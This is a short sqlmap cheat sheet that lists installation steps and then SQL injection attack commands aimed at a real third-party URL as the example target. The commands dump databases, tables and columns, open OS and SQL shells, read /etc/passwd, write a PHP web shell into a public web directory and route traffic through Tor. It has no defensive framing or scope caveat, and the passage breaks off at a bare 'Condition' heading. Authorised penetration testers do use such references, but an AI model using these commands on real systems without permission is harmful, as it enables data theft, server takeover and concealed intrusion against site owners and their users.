Installation

macOS

brew install sqlmap

Linux

sudo apt install sqlmap

Go-to Commands

sqlmap -u "https://google.com/?q=1" --dbs --no-cast --random-agent

Get data

All databases

sqlmap -u "https://google.com/?q=1" --dbs

All tables in db

sqlmap -u "https://google.com/?q=1" --tables -D "DB-NAME"

All columns in table

sqlmap -u "https://google.com/?q=1" -D "DB-NAME" -T "TABLE-NAME" --columns

Dumped contents

sqlmap -u "https://google.com/?q=1" -D "DB-NAME" -T "TABLE-NAME" --dump

Get Shell

Get OS Shell

sqlmap -u "https://google.com/?q=1" --os-shell

Get SQL Shell

sqlmap -u "https://google.com/?q=1" --sql-shell

File

Read File

sqlmap -u "https://google.com/?q=1" --file-read '/etc/passwd'

Write File

sqlmap -u "https://google.com/?q=1" --file-write './shell.php' --file-dest '/apache/public/shell.php'

With Tor

sqlmap -u "https://google.com/?q=1" --tor --tor-type=SOCKS5

Scanning a specific X

Scanning a selected parameter

sqlmap -u "https://google.com/?q=1&b=1" -p q

sqlmap -u "https://google.com/?q=1" \
 --cookie "abcd=1234; xcccc=1234; bgdfg=124" \
 -p abcd \
 --param-filter='COOKIE' \
 --level 2

Condition